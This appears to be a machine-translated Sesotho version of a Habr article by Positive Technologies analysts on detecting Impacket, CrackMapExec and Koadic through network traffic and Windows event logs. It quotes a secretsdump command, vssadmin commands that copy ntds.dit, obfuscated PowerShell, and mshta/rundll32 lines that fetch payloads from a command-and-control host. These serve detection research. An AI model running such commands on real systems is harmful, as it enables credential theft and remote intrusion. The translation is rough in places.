Palo ea litlhaselo lefapheng la likhoebo e ntse e eketseha selemo le selemo: mohlala ho feta ka 2016, 'me qetellong ea 2018 - ho feta nakong e fetileng. Ho kenyeletsoa le moo sesebelisoa se seholo sa ho sebetsa e leng sistimi e sebetsang ea Windows. Ka 2017-2018, APT Dragonfly, APT28, e ile ea hlasela 'muso le mekhatlo ea sesole Europe, Amerika Leboea le Saudi Arabia. Mme re sebelisitse lisebelisoa tse tharo bakeng sa sena - , и . Khoutu ea bona ea mohloli e bulehile ebile e fumaneha ho GitHub.
Ke habohlokoa ho hlokomela hore lisebelisoa tsena ha li sebelisetsoe ho kenella ka lekhetlo la pele, empa ho hlahisa tlhaselo ka har'a lisebelisoa. Bahlaseli ba li sebelisa ka mekhahlelo e fapaneng ea tlhaselo ka mor'a ho kenella ha perimeter. Sena, ka tsela, ho thata ho lemoha 'me hangata feela ka thuso ea theknoloji kapa lisebelisoa tse lumellang . Lisebelisoa li fana ka mesebetsi e sa tšoaneng, ho tloha ho fetisetsa lifaele ho ea ho sebelisana le ngoliso le ho phethahatsa litaelo mochine o hōle. Re entse boithuto ka lisebelisoa tsena ho fumana tšebetso ea marang-rang a tsona.
Seo re neng re lokela ho se etsa:
- Utloisisa hore na lisebelisoa tsa ho hacking li sebetsa joang. Fumana hore na bahlaseli ba hloka ho sebelisa eng le hore na ba ka sebelisa theknoloji efe.
- Fumana se sa bonoeng ke lisebelisoa tsa ts'ireletso ea tlhahisoleseling methating ea pele ea tlhaselo. Mokhahlelo oa ho hlahloba o ka 'na oa tlōloa, ebang ke hobane mohlaseli ke mohlaseli oa ka hare, kapa hobane mohlaseli a sebelisa sekoti mohahong oa motheo o neng o sa tsejoe pele. Hoa khoneha ho tsosolosa ketane eohle ea liketso tsa hae, kahoo takatso ea ho lemoha ho sisinyeha ho eketsehileng.
- Tlosa mekhoa e fosahetseng ho lisebelisoa tsa ho lemoha ho kenella. Ha rea lokela ho lebala hore ha liketso tse itseng li fumanoa motheong oa ho lemoha feela, liphoso tsa khafetsa li ka khoneha. Hangata ka har'a meaho ho na le mekhoa e mengata e lekaneng, e ke keng ea khetholloa ho tse nepahetseng ha u sheba ka lekhetlo la pele, ho fumana tlhahisoleseling efe kapa efe.
Lisebelisoa tsee li fa bahlaseli eng? Haeba sena e le Impacket, joale bahlaseli ba fumana laebrari e kholo ea li-modules tse ka sebelisoang ka mekhahlelo e fapaneng ea tlhaselo e latelang ka mor'a ho senya potoloho. Lisebelisoa tse ngata li sebelisa li-module tsa Impacket ka hare - mohlala, Metasploit. E na le dcomexec le wmiexec bakeng sa ts'ebetso ea taelo e hole, secretsdump bakeng sa ho fumana li-account tse tsoang mohopolong tse kentsoeng ho tsoa ho Impacket. Ka lebaka leo, ho lemoha ka nepo mosebetsi oa laebrari e joalo ho tla etsa bonnete ba ho lemoha lintho tse nkiloeng.
Ha ho makatse hore ebe baqapi ba ngotse "Powered by Impacket" ka CrackMapExec (kapa CME feela). Ntle le moo, CME e na le ts'ebetso e lokiselitsoeng bakeng sa maemo a tsebahalang: Mimikatz bakeng sa ho fumana li-password kapa li-hashes tsa bona, ts'ebetsong ea Meterpreter kapa moemeli oa Empire bakeng sa ts'ebetso e hole, le Bloodhound ka sekepeng.
Sesebelisoa sa boraro seo re se khethileng ke Koadic. Haufinyane tjena, e hlahisitsoe kopanong ea machaba ea hacker DEFCON 25 ka 2017 mme e khetholloa ka mokhoa o sa tloaelehang: e sebetsa ka HTTP, Java Script le Microsoft Visual Basic Script (VBS). Mokhoa ona o bitsoa ho phela ka mobu: sesebelisoa se sebelisa lihlopha tse itšetlehileng ka tsona le lilaebrari tse hahiloeng ho Windows. Baqapi ba e bitsa COM Command & Control, kapa C3.
IMPACKE
Ts'ebetso ea Impacket e pharaletse haholo, ho tloha ho boitsebahatso ka hare ho AD le ho bokella lintlha ho tsoa ho li-server tsa ka hare tsa MS SQL, ho ea ho mekhoa ea ho fumana lintlha: sena ke tlhaselo ea SMB relay, le ho fumana faele ea ntds.dit e nang le li-hashes tsa li-password tsa mosebelisi ho tsoa ho molaoli oa sebaka. Impacket e boetse e phethahatsa litaelo ka hole e sebelisa mekhoa e mene e fapaneng: WMI, Windows Scheduler Management Service, DCOM, le SMB, 'me e hloka mangolo a bopaki ho etsa joalo.
Lekunutu la thotobolo
Ha re shebeng ho lahlela sephiri. Ena ke module e ka lebisang mechini ea basebelisi le balaoli ba domain. E ka sebelisoa ho fumana likopi tsa libaka tsa memori LSA, SAM, SECURITY, NTDS.dit, kahoo e ka bonoa ka mekhahlelo e fapaneng ea tlhaselo. Mohato oa pele ts'ebetsong ea mojule ke netefatso ka SMB, e hlokang password ea mosebelisi kapa hash ea eona hore e phethe tlhaselo ea Hash ka bo eona. Ka mor'a moo ho tla kopo ea ho bula monyetla oa ho kena ho Mookameli oa Taolo ea Ts'ebeletso (SCM) le ho fumana phihlello ea ngoliso ka protocol ea winreg, eo mohlaseli a ka fumanang lintlha tsa makala a thahasello mme a fumana liphetho ka SMB.
Ho feiga. 1 re bona kamoo hantle ha re sebelisa protocol ea winreg, phihlello e fumanoa ho sebelisoa senotlolo sa ngoliso le LSA. Ho etsa sena, sebelisa taelo ea DCERPC ka opcode 15 - OpenKey.
Raese. 1. Ho bula senotlolo sa ngoliso ho sebelisa protocol ea winreg
Ka mor'a moo, ha ho fihlella senotlolo se fumanoa, litekanyetso li bolokiloe ka taelo ea SaveKey ka opcode 20. Impacket e etsa sena ka tsela e tobileng haholo. E boloka boleng faeleng eo lebitso la eona e leng letoto la litlhaku tse 8 tse kentsoeng ka .tmp. Ho phaella moo, ho kenya faele ena ka ho eketsehileng ho etsahala ka SMB ho tswa ho System32 directory (setšoantšo sa 2).
Raese. 2. Morero oa ho fumana senotlolo sa ngoliso mochining o hole
Hoa etsahala hore ts'ebetso e joalo marang-rang e ka bonoa ka lipotso ho makala a mang a ngoliso a sebelisa protocol ea winreg, mabitso a itseng, litaelo le tatellano ea bona.
Mojule ona o boetse o siea mesaletsa lethathamong la liketsahalo tsa Windows, ho etsa hore ho be bonolo ho o lemoha. Ka mohlala, ka lebaka la ho phethahatsa taelo
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCHo Windows Server 2016 log re tla bona tatellano e latelang ea bohlokoa ea liketsahalo:
1. 4624 - Logon e hole.
2. 5145 - ho hlahloba litokelo tsa ho fihlella ho winreg remote service.
3. 5145 - ho hlahloba litokelo tsa ho fumana lifaele bukeng ea System32. Faele e na le lebitso le sa tloaelehang le boletsoeng ka holimo.
4. 4688 - ho theha ts'ebetso ea cmd.exe e hlahisang vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - ho theha ts'ebetso ka taelo:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - ho theha ts'ebetso ka taelo:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - ho theha ts'ebetso ka taelo:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Joalo ka lisebelisoa tse ngata tsa ts'ebeliso ea morao-rao, Impacket e na le li-module tsa ho etsa litaelo tse hole. Re tla tsepamisa maikutlo ho smbexec, e fanang ka khetla ea taelo e sebetsang mochining o hole. Mojule ona o boetse o hloka netefatso ka SMB, ebang ke ka password kapa password hash. Ho sa feiga. Setšoantšong sa 3 re bona mohlala oa kamoo sesebelisoa se joalo se sebetsang kateng, tabeng ena ke console ea mookameli oa sebaka seo.
Raese. 3. Interactive smbexec console
Mohato oa pele oa smbexec kamora ho netefatsoa ke ho bula SCM ka taelo ea OpenSCManagerW (15). Potso e bohlokoa: lebala la MachineName ke DUMMY.
Raese. 4. Kopa ho bula Mookameli oa Taolo ea Litšebeletso
Ka mor'a moo, tšebeletso e etsoa ho sebelisoa taelo ea CreateServiceW (12). Tabeng ea smbexec, re ka bona mohopolo o tšoanang oa kaho nako le nako. Ho feiga. 5 e tala e bontša li-parameter tse sa fetoheng tsa taelo, mosehla o bontša seo mohlaseli a ka se fetolang. Ho bonolo ho bona hore lebitso la faele e sebetsang, bukana ea eona le faele ea tlhahiso li ka fetoloa, empa tse ling kaofela li thata haholo ho li fetola ntle le ho senya mohopolo oa module ea Impacket.
Raese. 5. Kopa ho theha tšebeletso ka ho sebelisa Mookameli oa Taolo ea Tšebeletso
Smbexec e boetse e siea mesaletsa e hlakileng lethathamong la liketsahalo la Windows. Ho Windows Server 2016 log bakeng sa khetla ea taelo e sebetsanang le taelo ea ipconfig, re tla bona tatellano e latelang ea liketsahalo:
1. 4697 - ho kenya ts'ebeletso mochining oa motho ea hlasetsoeng:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - ho theha ts'ebetso ea cmd.exe ka likhang tse tsoang ntlheng ea 1.
3. 5145 - ho lekola litokelo tsa phihlello ho __output faele bukeng ea C$.
4. 4697 - ho kenya ts'ebeletso mochining oa phofu.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ho theha ts'ebetso ea cmd.exe ka likhang tse tsoang ntlheng ea 4.
6. 5145 - ho lekola litokelo tsa phihlello ho __output faele bukeng ea C$.
Impacket ke motheo oa nts'etsopele ea lisebelisoa tsa tlhaselo. E ts'ehetsa hoo e batlang e le liprothokholo tsohle tsa lits'ebetso tsa Windows mme ka nako e ts'oanang e na le likarolo tsa eona. Mona ke likopo tse ikhethileng tsa winreg, le ts'ebeliso ea SCM API e nang le sebopeho sa litaelo, le sebopeho sa lebitso la faele, le SMB share SYSTEM32.
CRACKMAPEXEC
Sesebelisoa sa CME se etselitsoe haholo-holo ho iketsetsa liketso tseo mohlaseli a lokelang ho li etsa ho tsoela pele ka har'a marang-rang. E u lumella ho sebetsa 'moho le moemeli ea tsebahalang oa Empire le Meterpreter. Ho phethahatsa litaelo ka sekhukhu, CME e ka li ferekanya. U sebelisa Bloodhound (sesebelisoa se arohaneng sa ho tsebahatsa), mohlaseli a ka iketsetsa patlo bakeng sa seboka sa batsamaisi ba sebaka se sebetsang.
Phallo ea mali
Bloodhound, e le sesebelisoa se ikemetseng, se lumella hore ho be le tsebo e tsoetseng pele ka har'a marang-rang. E bokella lintlha tse mabapi le basebelisi, mechini, lihlopha, linako 'me e fanoa e le mongolo oa PowerShell kapa faele ea binary. Liprothokholo tse thehiloeng ho LDAP kapa SMB li sebelisoa ho bokella tlhahisoleseling. Mojule oa ho kopanya oa CME o lumella Bloodhound hore e jarolloe mochining oa motho ea hlokofalitsoeng, e tsamaise le ho amohela data e bokelletsoeng kamora ho bolaoa, ka ho etsa liketso tse ikemetseng tsamaisong le ho etsa hore li se bonahale. Khetla ea setšoantšo sa Bloodhound e fana ka lintlha tse bokeletsoeng ka mokhoa oa li-graph, tse u lumellang hore u fumane tsela e khuts'oane ho tloha mochining oa mohlaseli ho ea ho molaoli oa sebaka.
Raese. 6. Sebopeho sa Bloodhound
Ho sebetsa mochining oa motho ea hlasetsoeng, mojule o theha mosebetsi o sebelisa ATSVC le SMB. ATSVC ke sebopeho sa ho sebetsa le Windows Task Scheduler. CME e sebelisa ts'ebetso ea eona ea NetrJobAdd(1) ho theha mesebetsi holim'a marang-rang. Mohlala oa seo mojule oa CME o se romelang o bontšoa ho Feiga. 7: Ena ke mohala oa taelo oa cmd.exe le khoutu e hlakileng ka mokhoa oa likhang ka sebopeho sa XML.
Setšoantšo sa 7. Ho theha mosebetsi ka CME
Ka mor'a hore mosebetsi o romelloe bakeng sa ho bolaoa, mochine oa phofu o qala Bloodhound ka boeona, 'me sena se ka bonoa sephethephethe. Mojule o khetholloa ka lipotso tsa LDAP ho fumana lihlopha tse tloaelehileng, lethathamo la mechini le basebelisi bohle sebakeng seo, le ho fumana tlhahisoleseling mabapi le linako tsa basebelisi ba mafolofolo ka kopo ea SRVSVC NetSessEnum.
Raese. 8. Ho fumana lenane la mananeo a sebetsang ka SMB
Ntle le moo, ho qala Bloodhound mochining oa motho ea hlasetsoeng ka tlhahlobo ea libuka ho tsamaisana le ketsahalo e nang le ID 4688 (tlhahiso ea ts'ebetso) le lebitso la ts'ebetso. «C:WindowsSystem32cmd.exe». Se hlokomelehang ka eona ke likhang tsa mola oa taelo:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Module ea enum_avproducts e thahasellisa haholo ho tloha ponong ea ts'ebetso le ts'ebetsong. WMI e u lumella ho sebelisa puo ea lipotso ea WQL ho fumana lintlha ho tsoa linthong tse fapaneng tsa Windows, e leng sona seo mojule ona oa CME o se sebelisang. E hlahisa lipotso ho sehlopha sa AntiSpywareProduct le AntiМirusProduct mabapi le lisebelisoa tsa ts'ireletso tse kentsoeng mochining oa phofu. E le hore u fumane boitsebiso bo hlokahalang, mojule o hokela ho rootSecurityCenter2 namespace, ebe o hlahisa potso ea WQL mme o fumana karabo. Ho feiga. Setšoantšo sa 9 se bontša likahare tsa likopo tse joalo le likarabo. Mohlala oa rona, Windows Defender e fumanoe.
Raese. 9. Ts'ebetso ea marang-rang ea module ea enum_avproducts
Hangata, tlhahlobo ea WMI (Trace WMI-Activity), eo liketsahalong tsa eona u ka fumanang lintlha tse molemo mabapi le lipotso tsa WQL, e ka emisoa. Empa haeba e nolofalitsoe, joale haeba enum_avproducts script e tsamaisoa, ketsahalo e nang le ID 11 e tla bolokoa. E tla ba le lebitso la mosebedisi ea rometseng kopo le lebitso sebakeng sa mabitso sa rootSecurityCenter2.
E 'ngoe le e 'ngoe ea li-module tsa CME e ne e e-na le lintho tsa eona tsa khale, e ka ba lipotso tse tobileng tsa WQL kapa ho thehoa ha mofuta o itseng oa mosebetsi ho kemiso ea mesebetsi e nang le obfuscation le mosebetsi o khethehileng oa Bloodhound ho LDAP le SMB.
KOADIC
Karolo e ikhethang ea Koadic ke tšebeliso ea bafetoleli ba JavaScript le VBScript ba hahiloeng ho Windows. Ka kutloisiso ena, e latela mokhoa oa ho phela ka mobu - ke hore, ha e na litšepe tsa kantle mme e sebelisa lisebelisoa tse tloaelehileng tsa Windows. Ena ke sesebelisoa sa Taelo le Taolo e feletseng (CnC), kaha ka mor'a tšoaetso "implant" e kenngoa mochine, e lumellang hore e laoloe. Mochine o joalo, ka mantsoe a Koadic, o bitsoa "zombie". Haeba ho na le litokelo tse sa lekaneng bakeng sa ts'ebetso e feletseng ka lehlakoreng la motho ea hlokofalitsoeng, Koadic e na le bokhoni ba ho e phahamisa ho sebelisa mekhoa ea ho laola Account Account bypass (UAC bypass).
Raese. 10. Koadic Shell
Motho ea hlokofalitsoeng o tlameha ho qala puisano le seva sa Command & Control. Ho etsa sena, o hloka ho ikopanya le URI e lokiselitsoeng pele mme a amohele 'mele o moholo oa Koadic a sebelisa e' ngoe ea li-stagers. Ho feiga. Setšoantšo sa 11 se bontša mohlala bakeng sa sebapali sa mshta.
Raese. 11. Ho qala lenaneo le seva sa CnC
Ho ipapisitsoe le mofuta oa karabelo WS, hoa hlaka hore ts'ebetso e etsahala ka WScript.Shell, 'me mefuta e fapaneng STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE e na le lintlha tsa bohlokoa mabapi le liparamente tsa seboka sa hajoale. Ena ke lekhetlo la pele la karabo ea kopo khokahanyong ea HTTP le seva sa CnC. Likopo tse latelang li amana ka kotloloho le ts'ebetso ea li-module tse bitsoang (li-implants). Li-module tsohle tsa Koadic li sebetsa feela ka nako e sebetsang le CnC.
Mimikatz
Joalo ka ha CME e sebetsa le Bloodhound, Koadic e sebetsa le Mimikatz e le lenaneo le arohaneng mme e na le mekhoa e mengata ea ho e qala. Ka tlase ho na le likopo tsa likarabo tsa ho khoasolla ho kenngoeng ha Mimikatz.
Raese. 12. Fetisetsa Mimikatz ho Koadic
U ka bona hore na sebopeho sa URI kopong se fetohile joang. Hona joale e na le boleng bakeng sa phapang ea csrf, e ikarabellang bakeng sa module e khethiloeng. Se ele hloko lebitso la hae; Kaofela rea tseba hore CSRF hangata e utloisisoa ka tsela e fapaneng. Karabelo e ne e le 'mele o le mong o ka sehloohong oa Koadic, oo khoutu e amanang le Mimikatz e ileng ea kenngoa teng. E kholo haholo, kahoo ha re shebeng lintlha tsa bohlokoa. Mona re na le laeborari ea Mimikatz e kentsoeng ka base64, sehlopha sa serialized .NET se tla e kenya, le likhang tsa ho qala Mimikatz. Sephetho sa ts'ebetso se fetisoa holim'a marang-rang ka mongolo o hlakileng.
Raese. 13. Sephetho sa ho tsamaisa Mimikatz mochine o hole
Exc_cmd
Koadic e boetse e na le li-module tse ka phethahatsang litaelo ka thōko. Mona re tla bona mokhoa o tšoanang oa tlhahiso ea URI le mefuta e tloaelehileng ea sid le csrf. Tabeng ea exec_cmd module, khoutu e eketsoa 'meleng o khonang ho phethahatsa litaelo tsa khetla. Ka tlase ho bontšitsoe khoutu e joalo e fumanehang karabong ea HTTP ea seva sa CnC.
Raese. 14. Kenya khoutu exec_cmd
Phapang ea GAWTUUGCFI e nang le tšobotsi e tloaelehileng ea WS ea hlokahala bakeng sa ts'ebetso ea khoutu. Ka thuso ea eona, implant e bitsa khetla, e sebetsana le makala a mabeli a khoutu - shell.exec ka ho khutla ha phallo ea data le shell.run ntle le ho khutla.
Koadic ha se sesebelisoa se tloaelehileng, empa e na le lintho tsa eona tsa khale tseo e ka fumanoang ka tsona sephethephetheng se nepahetseng:
- sebopeho se khethehileng sa likopo tsa HTTP,
- sebelisa winHttpRequests API,
- ho theha ntho ea WScript.Shell ka ActiveXObject,
- mmele o moholo o phethisoang.
Khokahano ea pele e qalisoa ke sethala, kahoo hoa khoneha ho bona ts'ebetso ea eona ka liketsahalo tsa Windows. Bakeng sa mshta, ena ke ketsahalo 4688, e bonts'ang ho theoa ha ts'ebetso e nang le tšobotsi ea ho qala:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Ha Koadic e ntse e sebetsa, u ka bona liketsahalo tse ling tsa 4688 tse nang le litšobotsi tse e khethollang hantle:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1fumanoeng ke
Mokhoa oa ho phela ka mobu o ntse o tumme har'a linokoane. Ba sebelisa lisebelisoa le mekhoa e hahiloeng ho Windows bakeng sa litlhoko tsa bona. Re bona lisebelisoa tse tsebahalang tsa Koadic, CrackMapExec le Impacket tse latelang molao-motheo ona li ntse li hlaha haholoanyane litlalehong tsa APT. Palo ea lifereko ho GitHub bakeng sa lisebelisoa tsena le eona e ntse e eketseha, 'me tse ncha lia hlaha (ho se ho ntse ho e-na le tse ka bang sekete hona joale). Mokhoa ona o ntse o tuma ka lebaka la bonolo ba ona: bahlaseli ha ba hloke lisebelisoa tsa mokha oa boraro; ba se ba ntse ba le mochining oa bahlaseluoa mme ba ba thusa ho feta mehato ea ts'ireletso. Re tsepamisa maikutlo ho ithuteng puisano ea marang-rang: sesebelisoa se seng le se seng se hlalositsoeng ka holimo se siea mesaletsa ea sona ho sephethephethe sa marang-rang; ho ithuta ka botlalo ka tsona ho ile ha re lumella ho ruta sehlahisoa sa rona bona, e leng se thusang ho batlisisa letoto lohle la liketsahalo tsa cyber tse ba amang.
Bangoli:
- Anton Tyurin, Hlooho ea Lefapha la Litšebeletso tsa Litsebi, Setsi sa Tšireletso sa Setsebi sa PT, Positive Technologies
- Egor Podmokov, setsebi, Setsi sa Tšireletso sa Setsebi sa PT, Positive Technologies
Source: www.habr.com